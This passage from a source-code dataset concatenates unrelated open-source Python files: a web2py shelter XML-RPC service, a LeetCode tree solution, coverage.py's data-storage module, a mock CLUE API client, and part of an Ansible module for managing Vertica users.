return db().select(db.cr_shelter.ALL).as_list()
if method == "read":
return db(db.cr_shelter.id == id).select().as_list()
if method == "delete":
status=db(db.cr_shelter.id == id).delete()
if status:
return "Success - record %d deleted!" % id
else:
return "Failed - no record %d!" % id
else:
return "Method not implemented!"
@service.xmlrpc
def create(name):
# Need to do validation manually!
id = db.cr_shelter.insert(name=name)
return id
@service.xmlrpc
def update(id, name):
# Need to do validation manually!
status = db(db.cr_shelter.id == id).update(name=name)
#@todo: audit!
if status:
return "Success - record %d updated!" % id
else:
return "Failed - no record %d!" % id
| mit |
lmmsoft/LeetCode | LeetCode-Algorithm/1123. Lowest Common Ancestor of Deepest Leaves/1123.py | 1 | 2318 | # Definition for a binary tree node.
from typing import Dict, List
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def lcaDeepestLeaves1(self, root: TreeNode) -> TreeNode:
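        # Approach: a DFS records every node's parent and buckets nodes by
        # depth; the deepest bucket is then walked upward in lockstep until
        # all paths converge on a single ancestor.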
self.parent: Dict[TreeNode, TreeNode] = {}
self.deep_list: Dict[int, List[TreeNode]] = {}
def dfs(n: TreeNode, deep: int):
if deep in self.deep_list:
self.deep_list[deep].append(n)
else:
self.deep_list[deep] = [n]
if n.left:
self.parent[n.left] = n
dfs(n.left, deep + 1)
if n.right:
self.parent[n.right] = n
dfs(n.right, deep + 1)
dfs(root, 0)
max_deep: int = max(self.deep_list.keys())
leaves: list = self.deep_list[max_deep]
while True:
s = set()
for l in leaves:
s.add(l)
if len(s) == 1:
return list(s)[0]
else:
leaves = [self.parent[leaf] for leaf in leaves]
return None
# rank 11 superluminal
    # Similar idea, implemented iteratively with BFS.
def lcaDeepestLeaves(self, root: TreeNode) -> TreeNode:
"""
:type root: TreeNode
:rtype: TreeNode
"""
parent = {}
queue = set([root])
while True:
next_queue = set()
for node in queue:
for child in (node.left, node.right):
if child:
parent[child] = node
next_queue.add(child)
if not next_queue:
break
queue = next_queue
        # At this point queue holds exactly the deepest leaves, since their
        # next_queue was empty.
while len(queue) > 1:
queue = set(parent[n] for n in queue)
for node in queue:
return node
if __name__ == '__main__':
n1 = TreeNode(1)
n2 = TreeNode(2)
n3 = TreeNode(3)
n4 = TreeNode(4)
n5 = TreeNode(5)
n1.left = n2
n1.right = n3
assert Solution().lcaDeepestLeaves(n1) == n1
n2.left = n4
assert Solution().lcaDeepestLeaves(n1) == n4
n2.right = n5
assert Solution().lcaDeepestLeaves(n1) == n2
| gpl-2.0 |
sdeepanshu02/microblog | flask/Lib/site-packages/coverage/data.py | 40 | 27599 | # Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://bitbucket.org/ned/coveragepy/src/default/NOTICE.txt
"""Coverage data for coverage.py."""
import glob
import itertools
import json
import optparse
import os
import os.path
import random
import re
import socket
from coverage import env
from coverage.backward import iitems, string_class
from coverage.debug import _TEST_NAME_FILE
from coverage.files import PathAliases
from coverage.misc import CoverageException, file_be_gone, isolate_module
os = isolate_module(os)
class CoverageData(object):
"""Manages collected coverage data, including file storage.
This class is the public supported API to the data coverage.py collects
during program execution. It includes information about what code was
executed. It does not include information from the analysis phase, to
determine what lines could have been executed, or what lines were not
executed.
.. note::
The file format is not documented or guaranteed. It will change in
the future, in possibly complicated ways. Do not read coverage.py
data files directly. Use this API to avoid disruption.
There are a number of kinds of data that can be collected:
* **lines**: the line numbers of source lines that were executed.
These are always available.
* **arcs**: pairs of source and destination line numbers for transitions
between source lines. These are only available if branch coverage was
used.
* **file tracer names**: the module names of the file tracer plugins that
handled each file in the data.
* **run information**: information about the program execution. This is
written during "coverage run", and then accumulated during "coverage
combine".
Lines, arcs, and file tracer names are stored for each source file. File
names in this API are case-sensitive, even on platforms with
case-insensitive file systems.
To read a coverage.py data file, use :meth:`read_file`, or
:meth:`read_fileobj` if you have an already-opened file. You can then
access the line, arc, or file tracer data with :meth:`lines`, :meth:`arcs`,
or :meth:`file_tracer`. Run information is available with
:meth:`run_infos`.
The :meth:`has_arcs` method indicates whether arc data is available. You
can get a list of the files in the data with :meth:`measured_files`.
A summary of the line data is available from :meth:`line_counts`. As with
most Python containers, you can determine if there is any data at all by
using this object as a boolean value.
Most data files will be created by coverage.py itself, but you can use
methods here to create data files if you like. The :meth:`add_lines`,
:meth:`add_arcs`, and :meth:`add_file_tracers` methods add data, in ways
that are convenient for coverage.py. The :meth:`add_run_info` method adds
key-value pairs to the run information.
To add a file without any measured data, use :meth:`touch_file`.
You write to a named file with :meth:`write_file`, or to an already opened
file with :meth:`write_fileobj`.
You can clear the data in memory with :meth:`erase`. Two data collections
can be combined by using :meth:`update` on one :class:`CoverageData`,
passing it the other.
"""
# The data file format is JSON, with these keys:
#
# * lines: a dict mapping file names to lists of line numbers
# executed::
#
# { "file1": [17,23,45], "file2": [1,2,3], ... }
#
# * arcs: a dict mapping file names to lists of line number pairs::
#
# { "file1": [[17,23], [17,25], [25,26]], ... }
#
# * file_tracers: a dict mapping file names to plugin names::
#
# { "file1": "django.coverage", ... }
#
# * runs: a list of dicts of information about the coverage.py runs
# contributing to the data::
#
# [ { "brief_sys": "CPython 2.7.10 Darwin" }, ... ]
#
# Only one of `lines` or `arcs` will be present: with branch coverage, data
# is stored as arcs. Without branch coverage, it is stored as lines. The
# line data is easily recovered from the arcs: it is all the first elements
# of the pairs that are greater than zero.
def __init__(self, debug=None):
"""Create a CoverageData.
`debug` is a `DebugControl` object for writing debug messages.
"""
self._debug = debug
# A map from canonical Python source file name to a dictionary in
# which there's an entry for each line number that has been
# executed:
#
# { 'filename1.py': [12, 47, 1001], ... }
#
self._lines = None
# A map from canonical Python source file name to a dictionary with an
# entry for each pair of line numbers forming an arc:
#
# { 'filename1.py': [(12,14), (47,48), ... ], ... }
#
self._arcs = None
# A map from canonical source file name to a plugin module name:
#
# { 'filename1.py': 'django.coverage', ... }
#
self._file_tracers = {}
# A list of dicts of information about the coverage.py runs.
self._runs = []
def __repr__(self):
return "<{klass} lines={lines} arcs={arcs} tracers={tracers} runs={runs}>".format(
klass=self.__class__.__name__,
lines="None" if self._lines is None else "{{{0}}}".format(len(self._lines)),
arcs="None" if self._arcs is None else "{{{0}}}".format(len(self._arcs)),
tracers="{{{0}}}".format(len(self._file_tracers)),
runs="[{0}]".format(len(self._runs)),
)
##
## Reading data
##
def has_arcs(self):
"""Does this data have arcs?
Arc data is only available if branch coverage was used during
collection.
Returns a boolean.
"""
return self._has_arcs()
def lines(self, filename):
"""Get the list of lines executed for a file.
If the file was not measured, returns None. A file might be measured,
and have no lines executed, in which case an empty list is returned.
If the file was executed, returns a list of integers, the line numbers
executed in the file. The list is in no particular order.
"""
if self._arcs is not None:
arcs = self._arcs.get(filename)
if arcs is not None:
all_lines = itertools.chain.from_iterable(arcs)
return list(set(l for l in all_lines if l > 0))
elif self._lines is not None:
return self._lines.get(filename)
return None
def arcs(self, filename):
"""Get the list of arcs executed for a file.
If the file was not measured, returns None. A file might be measured,
and have no arcs executed, in which case an empty list is returned.
If the file was executed, returns a list of 2-tuples of integers. Each
pair is a starting line number and an ending line number for a
transition from one line to another. The list is in no particular
order.
Negative numbers have special meaning. If the starting line number is
-N, it represents an entry to the code object that starts at line N.
        If the ending line number is -N, it's an exit from the code object that
starts at line N.
"""
if self._arcs is not None:
if filename in self._arcs:
return self._arcs[filename]
return None
def file_tracer(self, filename):
"""Get the plugin name of the file tracer for a file.
Returns the name of the plugin that handles this file. If the file was
measured, but didn't use a plugin, then "" is returned. If the file
was not measured, then None is returned.
"""
# Because the vast majority of files involve no plugin, we don't store
# them explicitly in self._file_tracers. Check the measured data
# instead to see if it was a known file with no plugin.
if filename in (self._arcs or self._lines or {}):
return self._file_tracers.get(filename, "")
return None
def run_infos(self):
"""Return the list of dicts of run information.
For data collected during a single run, this will be a one-element
list. If data has been combined, there will be one element for each
original data file.
"""
return self._runs
def measured_files(self):
"""A list of all files that had been measured."""
return list(self._arcs or self._lines or {})
def line_counts(self, fullpath=False):
"""Return a dict summarizing the line coverage data.
Keys are based on the file names, and values are the number of executed
lines. If `fullpath` is true, then the keys are the full pathnames of
the files, otherwise they are the basenames of the files.
Returns a dict mapping file names to counts of lines.
"""
summ = {}
if fullpath:
filename_fn = lambda f: f
else:
filename_fn = os.path.basename
for filename in self.measured_files():
summ[filename_fn(filename)] = len(self.lines(filename))
return summ
def __nonzero__(self):
return bool(self._lines or self._arcs)
__bool__ = __nonzero__
def read_fileobj(self, file_obj):
"""Read the coverage data from the given file object.
Should only be used on an empty CoverageData object.
"""
data = self._read_raw_data(file_obj)
self._lines = self._arcs = None
if 'lines' in data:
self._lines = data['lines']
if 'arcs' in data:
self._arcs = dict(
(fname, [tuple(pair) for pair in arcs])
for fname, arcs in iitems(data['arcs'])
)
self._file_tracers = data.get('file_tracers', {})
self._runs = data.get('runs', [])
self._validate()
def read_file(self, filename):
"""Read the coverage data from `filename` into this object."""
if self._debug and self._debug.should('dataio'):
self._debug.write("Reading data from %r" % (filename,))
try:
with self._open_for_reading(filename) as f:
self.read_fileobj(f)
except Exception as exc:
raise CoverageException(
"Couldn't read data from '%s': %s: %s" % (
filename, exc.__class__.__name__, exc,
)
)
_GO_AWAY = "!coverage.py: This is a private format, don't read it directly!"
@classmethod
def _open_for_reading(cls, filename):
"""Open a file appropriately for reading data."""
return open(filename, "r")
@classmethod
def _read_raw_data(cls, file_obj):
"""Read the raw data from a file object."""
go_away = file_obj.read(len(cls._GO_AWAY))
if go_away != cls._GO_AWAY:
raise CoverageException("Doesn't seem to be a coverage.py data file")
return json.load(file_obj)
@classmethod
def _read_raw_data_file(cls, filename):
"""Read the raw data from a file, for debugging."""
with cls._open_for_reading(filename) as f:
return cls._read_raw_data(f)
##
## Writing data
##
def add_lines(self, line_data):
"""Add measured line data.
`line_data` is a dictionary mapping file names to dictionaries::
{ filename: { lineno: None, ... }, ...}
"""
if self._debug and self._debug.should('dataop'):
self._debug.write("Adding lines: %d files, %d lines total" % (
len(line_data), sum(len(lines) for lines in line_data.values())
))
if self._has_arcs():
raise CoverageException("Can't add lines to existing arc data")
if self._lines is None:
self._lines = {}
for filename, linenos in iitems(line_data):
if filename in self._lines:
new_linenos = set(self._lines[filename])
new_linenos.update(linenos)
linenos = new_linenos
self._lines[filename] = list(linenos)
self._validate()
def add_arcs(self, arc_data):
"""Add measured arc data.
`arc_data` is a dictionary mapping file names to dictionaries::
{ filename: { (l1,l2): None, ... }, ...}
"""
if self._debug and self._debug.should('dataop'):
self._debug.write("Adding arcs: %d files, %d arcs total" % (
len(arc_data), sum(len(arcs) for arcs in arc_data.values())
))
if self._has_lines():
raise CoverageException("Can't add arcs to existing line data")
if self._arcs is None:
self._arcs = {}
for filename, arcs in iitems(arc_data):
if filename in self._arcs:
new_arcs = set(self._arcs[filename])
new_arcs.update(arcs)
arcs = new_arcs
self._arcs[filename] = list(arcs)
self._validate()
def add_file_tracers(self, file_tracers):
"""Add per-file plugin information.
`file_tracers` is { filename: plugin_name, ... }
"""
if self._debug and self._debug.should('dataop'):
self._debug.write("Adding file tracers: %d files" % (len(file_tracers),))
existing_files = self._arcs or self._lines or {}
for filename, plugin_name in iitems(file_tracers):
if filename not in existing_files:
raise CoverageException(
"Can't add file tracer data for unmeasured file '%s'" % (filename,)
)
existing_plugin = self._file_tracers.get(filename)
if existing_plugin is not None and plugin_name != existing_plugin:
raise CoverageException(
"Conflicting file tracer name for '%s': %r vs %r" % (
filename, existing_plugin, plugin_name,
)
)
self._file_tracers[filename] = plugin_name
self._validate()
def add_run_info(self, **kwargs):
"""Add information about the run.
Keywords are arbitrary, and are stored in the run dictionary. Values
must be JSON serializable. You may use this function more than once,
but repeated keywords overwrite each other.
"""
if self._debug and self._debug.should('dataop'):
self._debug.write("Adding run info: %r" % (kwargs,))
if not self._runs:
self._runs = [{}]
self._runs[0].update(kwargs)
self._validate()
def touch_file(self, filename):
"""Ensure that `filename` appears in the data, empty if needed."""
if self._debug and self._debug.should('dataop'):
self._debug.write("Touching %r" % (filename,))
if not self._has_arcs() and not self._has_lines():
raise CoverageException("Can't touch files in an empty CoverageData")
if self._has_arcs():
where = self._arcs
else:
where = self._lines
where.setdefault(filename, [])
self._validate()
def write_fileobj(self, file_obj):
"""Write the coverage data to `file_obj`."""
# Create the file data.
file_data = {}
if self._has_arcs():
file_data['arcs'] = self._arcs
if self._has_lines():
file_data['lines'] = self._lines
if self._file_tracers:
file_data['file_tracers'] = self._file_tracers
if self._runs:
file_data['runs'] = self._runs
# Write the data to the file.
file_obj.write(self._GO_AWAY)
json.dump(file_data, file_obj)
def write_file(self, filename):
"""Write the coverage data to `filename`."""
if self._debug and self._debug.should('dataio'):
self._debug.write("Writing data to %r" % (filename,))
with open(filename, 'w') as fdata:
self.write_fileobj(fdata)
def erase(self):
"""Erase the data in this object."""
self._lines = None
self._arcs = None
self._file_tracers = {}
self._runs = []
self._validate()
def update(self, other_data, aliases=None):
"""Update this data with data from another `CoverageData`.
If `aliases` is provided, it's a `PathAliases` object that is used to
re-map paths to match the local machine's.
"""
if self._has_lines() and other_data._has_arcs():
raise CoverageException("Can't combine arc data with line data")
if self._has_arcs() and other_data._has_lines():
raise CoverageException("Can't combine line data with arc data")
aliases = aliases or PathAliases()
# _file_tracers: only have a string, so they have to agree.
# Have to do these first, so that our examination of self._arcs and
# self._lines won't be confused by data updated from other_data.
for filename in other_data.measured_files():
other_plugin = other_data.file_tracer(filename)
filename = aliases.map(filename)
this_plugin = self.file_tracer(filename)
if this_plugin is None:
if other_plugin:
self._file_tracers[filename] = other_plugin
elif this_plugin != other_plugin:
raise CoverageException(
"Conflicting file tracer name for '%s': %r vs %r" % (
filename, this_plugin, other_plugin,
)
)
# _runs: add the new runs to these runs.
self._runs.extend(other_data._runs)
# _lines: merge dicts.
if other_data._has_lines():
if self._lines is None:
self._lines = {}
for filename, file_lines in iitems(other_data._lines):
filename = aliases.map(filename)
if filename in self._lines:
lines = set(self._lines[filename])
lines.update(file_lines)
file_lines = list(lines)
self._lines[filename] = file_lines
# _arcs: merge dicts.
if other_data._has_arcs():
if self._arcs is None:
self._arcs = {}
for filename, file_arcs in iitems(other_data._arcs):
filename = aliases.map(filename)
if filename in self._arcs:
arcs = set(self._arcs[filename])
arcs.update(file_arcs)
file_arcs = list(arcs)
self._arcs[filename] = file_arcs
self._validate()
##
## Miscellaneous
##
def _validate(self):
"""If we are in paranoid mode, validate that everything is right."""
if env.TESTING:
self._validate_invariants()
def _validate_invariants(self):
"""Validate internal invariants."""
# Only one of _lines or _arcs should exist.
assert not(self._has_lines() and self._has_arcs()), (
"Shouldn't have both _lines and _arcs"
)
# _lines should be a dict of lists of ints.
if self._has_lines():
for fname, lines in iitems(self._lines):
assert isinstance(fname, string_class), "Key in _lines shouldn't be %r" % (fname,)
assert all(isinstance(x, int) for x in lines), (
"_lines[%r] shouldn't be %r" % (fname, lines)
)
# _arcs should be a dict of lists of pairs of ints.
if self._has_arcs():
for fname, arcs in iitems(self._arcs):
assert isinstance(fname, string_class), "Key in _arcs shouldn't be %r" % (fname,)
assert all(isinstance(x, int) and isinstance(y, int) for x, y in arcs), (
"_arcs[%r] shouldn't be %r" % (fname, arcs)
)
# _file_tracers should have only non-empty strings as values.
for fname, plugin in iitems(self._file_tracers):
assert isinstance(fname, string_class), (
"Key in _file_tracers shouldn't be %r" % (fname,)
)
assert plugin and isinstance(plugin, string_class), (
"_file_tracers[%r] shoudn't be %r" % (fname, plugin)
)
# _runs should be a list of dicts.
for val in self._runs:
assert isinstance(val, dict)
for key in val:
assert isinstance(key, string_class), "Key in _runs shouldn't be %r" % (key,)
def add_to_hash(self, filename, hasher):
"""Contribute `filename`'s data to the `hasher`.
`hasher` is a `coverage.misc.Hasher` instance to be updated with
the file's data. It should only get the results data, not the run
data.
"""
if self._has_arcs():
hasher.update(sorted(self.arcs(filename) or []))
else:
hasher.update(sorted(self.lines(filename) or []))
hasher.update(self.file_tracer(filename))
##
## Internal
##
def _has_lines(self):
"""Do we have data in self._lines?"""
return self._lines is not None
def _has_arcs(self):
"""Do we have data in self._arcs?"""
return self._arcs is not None
class CoverageDataFiles(object):
"""Manage the use of coverage data files."""
def __init__(self, basename=None, warn=None):
"""Create a CoverageDataFiles to manage data files.
`warn` is the warning function to use.
`basename` is the name of the file to use for storing data.
"""
self.warn = warn
# Construct the file name that will be used for data storage.
self.filename = os.path.abspath(basename or ".coverage")
def erase(self, parallel=False):
"""Erase the data from the file storage.
If `parallel` is true, then also deletes data files created from the
basename by parallel-mode.
"""
file_be_gone(self.filename)
if parallel:
data_dir, local = os.path.split(self.filename)
localdot = local + '.*'
pattern = os.path.join(os.path.abspath(data_dir), localdot)
for filename in glob.glob(pattern):
file_be_gone(filename)
def read(self, data):
"""Read the coverage data."""
if os.path.exists(self.filename):
data.read_file(self.filename)
def write(self, data, suffix=None):
"""Write the collected coverage data to a file.
`suffix` is a suffix to append to the base file name. This can be used
for multiple or parallel execution, so that many coverage data files
can exist simultaneously. A dot will be used to join the base name and
the suffix.
"""
filename = self.filename
if suffix is True:
# If data_suffix was a simple true value, then make a suffix with
# plenty of distinguishing information. We do this here in
# `save()` at the last minute so that the pid will be correct even
# if the process forks.
extra = ""
if _TEST_NAME_FILE: # pragma: debugging
with open(_TEST_NAME_FILE) as f:
test_name = f.read()
extra = "." + test_name
suffix = "%s%s.%s.%06d" % (
socket.gethostname(), extra, os.getpid(),
random.randint(0, 999999)
)
if suffix:
filename += "." + suffix
data.write_file(filename)
def combine_parallel_data(self, data, aliases=None, data_paths=None):
"""Combine a number of data files together.
Treat `self.filename` as a file prefix, and combine the data from all
of the data files starting with that prefix plus a dot.
If `aliases` is provided, it's a `PathAliases` object that is used to
re-map paths to match the local machine's.
If `data_paths` is provided, it is a list of directories or files to
combine. Directories are searched for files that start with
`self.filename` plus dot as a prefix, and those files are combined.
If `data_paths` is not provided, then the directory portion of
`self.filename` is used as the directory to search for data files.
Every data file found and combined is then deleted from disk. If a file
cannot be read, a warning will be issued, and the file will not be
deleted.
"""
# Because of the os.path.abspath in the constructor, data_dir will
# never be an empty string.
data_dir, local = os.path.split(self.filename)
localdot = local + '.*'
data_paths = data_paths or [data_dir]
files_to_combine = []
for p in data_paths:
if os.path.isfile(p):
files_to_combine.append(os.path.abspath(p))
elif os.path.isdir(p):
pattern = os.path.join(os.path.abspath(p), localdot)
files_to_combine.extend(glob.glob(pattern))
else:
raise CoverageException("Couldn't combine from non-existent path '%s'" % (p,))
for f in files_to_combine:
new_data = CoverageData()
try:
new_data.read_file(f)
except CoverageException as exc:
if self.warn:
# The CoverageException has the file name in it, so just
# use the message as the warning.
self.warn(str(exc))
else:
data.update(new_data, aliases=aliases)
file_be_gone(f)
def canonicalize_json_data(data):
"""Canonicalize our JSON data so it can be compared."""
for fname, lines in iitems(data.get('lines', {})):
data['lines'][fname] = sorted(lines)
for fname, arcs in iitems(data.get('arcs', {})):
data['arcs'][fname] = sorted(arcs)
def pretty_data(data):
"""Format data as JSON, but as nicely as possible.
Returns a string.
"""
# Start with a basic JSON dump.
out = json.dumps(data, indent=4, sort_keys=True)
# But pairs of numbers shouldn't be split across lines...
out = re.sub(r"\[\s+(-?\d+),\s+(-?\d+)\s+]", r"[\1, \2]", out)
# Trailing spaces mess with tests, get rid of them.
out = re.sub(r"(?m)\s+$", "", out)
return out
def debug_main(args):
"""Dump the raw data from data files.
Run this as::
$ python -m coverage.data [FILE]
"""
parser = optparse.OptionParser()
parser.add_option(
"-c", "--canonical", action="store_true",
help="Sort data into a canonical order",
)
options, args = parser.parse_args(args)
for filename in (args or [".coverage"]):
print("--- {0} ------------------------------".format(filename))
data = CoverageData._read_raw_data_file(filename)
if options.canonical:
canonicalize_json_data(data)
print(pretty_data(data))
if __name__ == '__main__':
import sys
debug_main(sys.argv[1:])
| bsd-3-clause |
cmap/cmapPy | cmapPy/clue_api_client/mock_clue_api_client.py | 1 | 1622 | import logging
import cmapPy.clue_api_client.setup_logger as setup_logger
import cmapPy.clue_api_client.clue_api_client as clue_api_client
__authors__ = "David L. Lahr"
__email__ = "[email protected]"
logger = logging.getLogger(setup_logger.LOGGER_NAME)
class MockClueApiClient(clue_api_client.ClueApiClient):
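    # Test double for ClueApiClient: each run_* method ignores its arguments
    # and returns the canned result supplied at construction time, falling
    # back to default_return_values when no specific result was provided.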
def __init__(self, base_url=None, user_key=None, default_return_values=None, filter_query_result=None,
count_query_result=None, post_result=None, delete_result=None, put_result=None):
super(MockClueApiClient, self).__init__(base_url=base_url, user_key=user_key)
self.default_return_values = default_return_values if default_return_values else []
self.filter_query_result = filter_query_result if filter_query_result else self.default_return_values
self.count_query_result = count_query_result if count_query_result else self.default_return_values
self.post_result = post_result if post_result else self.default_return_values
self.delete_result = delete_result if delete_result else self.default_return_values
self.put_result = put_result if put_result else self.default_return_values
def run_filter_query(self, resource_name, filter_clause):
return self.filter_query_result
def run_count_query(self, resource_name, where_clause):
return self.count_query_result
def run_post(self, resource_name, data):
return self.post_result
def run_delete(self, resource_name, id):
return self.delete_result
def run_put(self, resource_name, id, data):
return self.put_result
| bsd-3-clause |
maxamillion/ansible-modules-extras | database/vertica/vertica_user.py | 15 | 14712 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = """
---
module: vertica_user
version_added: '2.0'
short_description: Adds or removes Vertica database users and assigns roles.
description:
- Adds or removes Vertica database user and, optionally, assigns roles.
- A user will not be removed until all the dependencies have been dropped.
- In such a situation, if the module tries to remove the user it
will fail and only remove roles granted to the user.
options:
name:
description:
- Name of the user to add or remove.
required: true
profile:
description:
- Sets the user's profile.
required: false
default: null
resource_pool:
description:
- Sets the user's resource pool.
required: false
default: null
password:
description:
- The user's password encrypted by the MD5 algorithm.
- The password must be generated with the format C("md5" + md5[password + username]),
resulting in a total of 35 characters. An easy way to do this is by querying
the Vertica database with select 'md5'||md5('<user_password><user_name>').
required: false
default: null
expired:
description:
- Sets the user's password expiration.
required: false
default: null
ldap:
description:
- Set to true if users are authenticated via LDAP.
- The user will be created with password expired and set to I($ldap$).
required: false
default: null
roles:
description:
- Comma separated list of roles to assign to the user.
aliases: ['role']
required: false
default: null
state:
description:
    - Whether to create C(present), drop C(absent), or lock C(locked) the user.
required: false
choices: ['present', 'absent', 'locked']
default: present
db:
description:
- Name of the Vertica database.
required: false
default: null
cluster:
description:
- Name of the Vertica cluster.
required: false
default: localhost
port:
description:
- Vertica cluster port to connect to.
required: false
default: 5433
login_user:
description:
- The username used to authenticate with.
required: false
default: dbadmin
login_password:
description:
- The password used to authenticate with.
required: false
default: null
notes:
- The default authentication assumes that you are either logging in as or sudo'ing
to the C(dbadmin) account on the host.
- This module uses C(pyodbc), a Python ODBC database adapter. You must ensure
  that C(unixODBC) and C(pyodbc) are installed on the host and properly configured.
- Configuring C(unixODBC) for Vertica requires C(Driver = /opt/vertica/lib64/libverticaodbc.so)
to be added to the C(Vertica) section of either C(/etc/odbcinst.ini) or C($HOME/.odbcinst.ini)
and both C(ErrorMessagesPath = /opt/vertica/lib64) and C(DriverManagerEncoding = UTF-16)
to be added to the C(Driver) section of either C(/etc/vertica.ini) or C($HOME/.vertica.ini).
requirements: [ 'unixODBC', 'pyodbc' ]
author: "Dariusz Owczarek (@dareko)"
"""
EXAMPLES = """
- name: creating a new vertica user with password
vertica_user: name=user_name password=md5<encrypted_password> db=db_name state=present
- name: creating a new vertica user authenticated via ldap with roles assigned
vertica_user:
name=user_name
ldap=true
db=db_name
roles=schema_name_ro
state=present
"""
try:
import pyodbc
except ImportError:
pyodbc_found = False
else:
pyodbc_found = True
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.pycompat24 import get_exception
class NotSupportedError(Exception):
pass
class CannotDropError(Exception):
pass
# module specific functions
def get_user_facts(cursor, user=''):
facts = {}
cursor.execute("""
select u.user_name, u.is_locked, u.lock_time,
p.password, p.acctexpired as is_expired,
u.profile_name, u.resource_pool,
u.all_roles, u.default_roles
from users u join password_auditor p on p.user_id = u.user_id
where not u.is_super_user
and (? = '' or u.user_name ilike ?)
""", user, user)
while True:
rows = cursor.fetchmany(100)
if not rows:
break
for row in rows:
user_key = row.user_name.lower()
facts[user_key] = {
'name': row.user_name,
'locked': str(row.is_locked),
'password': row.password,
'expired': str(row.is_expired),
'profile': row.profile_name,
'resource_pool': row.resource_pool,
'roles': [],
'default_roles': []}
if row.is_locked:
facts[user_key]['locked_time'] = str(row.lock_time)
if row.all_roles:
facts[user_key]['roles'] = row.all_roles.replace(' ', '').split(',')
if row.default_roles:
facts[user_key]['default_roles'] = row.default_roles.replace(' ', '').split(',')
return facts
def update_roles(user_facts, cursor, user,
                 existing_all, existing_default, required):
    """Revoke obsolete roles, grant missing ones and reset the default roles."""
del_roles = list(set(existing_all) - set(required))
if del_roles:
cursor.execute("revoke {0} from {1}".format(','.join(del_roles), user))
new_roles = list(set(required) - set(existing_all))
if new_roles:
cursor.execute("grant {0} to {1}".format(','.join(new_roles), user))
if required:
cursor.execute("alter user {0} default role {1}".format(user, ','.join(required)))
def check(user_facts, user, profile, resource_pool,
          locked, password, expired, ldap, roles):
    """Return True if the user already matches the requested state."""
user_key = user.lower()
if user_key not in user_facts:
return False
if profile and profile != user_facts[user_key]['profile']:
return False
if resource_pool and resource_pool != user_facts[user_key]['resource_pool']:
return False
if locked != (user_facts[user_key]['locked'] == 'True'):
return False
if password and password != user_facts[user_key]['password']:
return False
    if (expired is not None and expired != (user_facts[user_key]['expired'] == 'True')) or \
            (ldap is not None and ldap != (user_facts[user_key]['expired'] == 'True')):
        return False
if roles and (cmp(sorted(roles), sorted(user_facts[user_key]['roles'])) != 0 or \
cmp(sorted(roles), sorted(user_facts[user_key]['default_roles'])) != 0):
return False
return True
def present(user_facts, cursor, user, profile, resource_pool,
            locked, password, expired, ldap, roles):
    """Create the user, or alter an existing one; return True on change."""
user_key = user.lower()
if user_key not in user_facts:
query_fragments = ["create user {0}".format(user)]
if locked:
query_fragments.append("account lock")
if password or ldap:
if password:
query_fragments.append("identified by '{0}'".format(password))
else:
query_fragments.append("identified by '$ldap$'")
if expired or ldap:
query_fragments.append("password expire")
if profile:
query_fragments.append("profile {0}".format(profile))
if resource_pool:
query_fragments.append("resource pool {0}".format(resource_pool))
cursor.execute(' '.join(query_fragments))
if resource_pool and resource_pool != 'general':
cursor.execute("grant usage on resource pool {0} to {1}".format(
resource_pool, user))
update_roles(user_facts, cursor, user, [], [], roles)
user_facts.update(get_user_facts(cursor, user))
return True
else:
changed = False
query_fragments = ["alter user {0}".format(user)]
if locked is not None and locked != (user_facts[user_key]['locked'] == 'True'):
if locked:
state = 'lock'
else:
state = 'unlock'
query_fragments.append("account {0}".format(state))
changed = True
if password and password != user_facts[user_key]['password']:
query_fragments.append("identified by '{0}'".format(password))
changed = True
if ldap:
if ldap != (user_facts[user_key]['expired'] == 'True'):
query_fragments.append("password expire")
changed = True
elif expired is not None and expired != (user_facts[user_key]['expired'] == 'True'):
if expired:
query_fragments.append("password expire")
changed = True
else:
raise NotSupportedError("Unexpiring user password is not supported.")
if profile and profile != user_facts[user_key]['profile']:
query_fragments.append("profile {0}".format(profile))
changed = True
if resource_pool and resource_pool != user_facts[user_key]['resource_pool']:
query_fragments.append("resource pool {0}".format(resource_pool))
if user_facts[user_key]['resource_pool'] != 'general':
cursor.execute("revoke usage on resource pool {0} from {1}".format(
user_facts[user_key]['resource_pool'], user))
if resource_pool != 'general':
cursor.execute("grant usage on resource pool {0} to {1}".format(
resource_pool, user))
changed = True
if changed:
cursor.execute(' '.join(query_fragments))
if roles and (cmp(sorted(roles), sorted(user_facts[user_key]['roles'])) != 0 or \
cmp(sorted(roles), sorted(user_facts[user_key]['default_roles'])) != 0):
update_roles(user_facts, cursor, user,
user_facts[user_key]['roles'], user_facts[user_key]['default_roles'], roles)
changed = True
if changed:
user_facts.update(get_user_facts(cursor, user))
return changed
def absent(user_facts, cursor, user, roles):
    """Revoke the user's roles and drop it; return True if the user existed."""
user_key = user.lower()
if user_key in user_facts:
update_roles(user_facts, cursor, user,
user_facts[user_key]['roles'], user_facts[user_key]['default_roles'], [])
try:
cursor.execute("drop user {0}".format(user_facts[user_key]['name']))
except pyodbc.Error:
raise CannotDropError("Dropping user failed due to dependencies.")
del user_facts[user_key]
return True
else:
return False
# module logic
def main():
module = AnsibleModule(
argument_spec=dict(
user=dict(required=True, aliases=['name']),
profile=dict(default=None),
resource_pool=dict(default=None),
password=dict(default=None),
expired=dict(type='bool', default=None),
ldap=dict(type='bool', default=None),
roles=dict(default=None, aliases=['role']),
state=dict(default='present', choices=['absent', 'present', 'locked']),
db=dict(default=None),
cluster=dict(default='localhost'),
port=dict(default='5433'),
login_user=dict(default='dbadmin'),
login_password=dict(default=None),
), supports_check_mode = True)
if not pyodbc_found:
module.fail_json(msg="The python pyodbc module is required.")
user = module.params['user']
profile = module.params['profile']
if profile:
profile = profile.lower()
resource_pool = module.params['resource_pool']
if resource_pool:
resource_pool = resource_pool.lower()
password = module.params['password']
expired = module.params['expired']
ldap = module.params['ldap']
roles = []
if module.params['roles']:
roles = module.params['roles'].split(',')
roles = filter(None, roles)
state = module.params['state']
if state == 'locked':
locked = True
else:
locked = False
db = ''
if module.params['db']:
